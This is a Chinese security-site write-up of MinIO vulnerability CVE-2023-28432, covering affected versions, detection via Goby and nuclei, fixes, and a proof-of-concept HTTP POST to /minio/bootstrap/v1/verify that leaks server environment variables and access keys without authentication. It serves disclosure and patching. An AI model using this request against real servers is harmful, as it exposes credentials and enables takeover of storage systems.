【漏洞复现】MinIO敏感信息泄露（CVE-2023-28432）

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

2023-04-23 09:27:31

所属地天津

0x01 简介

MinIO是一个应用在云场景下的对象存储服务，MinIO近期公开了敏感信息泄露漏洞，攻击者在不经过身份认证的情况下即可获取服务端敏感配置信息，其中包括环境变量，有的服务器还会获取到AK/SK，获取后可直接登录后台。此漏洞影响集群节点，单节点不受影响。

0x02 影响版本

RELEASE.2019-12-17T23-16-33Z <= MinIo < RELEASE.2023-03-20T20-16-18Z

0x03 漏洞复现

PoC已经公开，而且利用方式很简单，所以威胁比较大，直接一个Post请求即可触发该漏洞。

Goby目前已更新该漏洞的检测插件，详情可参考如下链接：https://github.com/gobysec/CVE-2023-28432

nuclei也支持此漏洞的检测，命令如下：

nuclei -v -t /path/to/CVE-2023-28432.yaml -u http://xx.xx.xx.xx

MinIO默认是9000端口，访问此端口的应服务，返回如下登录页面，则可以尝试进行利用。

1682213154_64448922840ddcb28cce0.png!small

利用成功截图。

1682213165_6444892d5e337b2816553.png!small

PoC：

POST /minio/bootstrap/v1/verify HTTP/1.1

Host: xx.xx.xx.xx

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

0x04 修复方案

1、升级到安全版本RELEASE.2023-03-20T20-16-18Z，下载链接：https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z。

2、临时修复方案，在waf上配置策略，拒绝所有post到/minio/bootstrap/v1/verify的请求。

参考链接：

https://github.com/Mr-xn/CVE-2023-28432

https://nvd.nist.gov/vuln/detail/CVE-2023-28432

# web安全 # 漏洞复现

免责声明

1.一般免责声明：本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明：文中技术内容可能不适用于所有情况或系统，在实际应用前请充分测试和评估。若因使用不当造成的任何问题，相关方不承担责任。

3. 更新声明：技术发展迅速，文章内容可能存在滞后性。读者需自行判断信息的时效性，因依据过时内容产生的后果，作者及发布平台不承担责任。

本文为独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多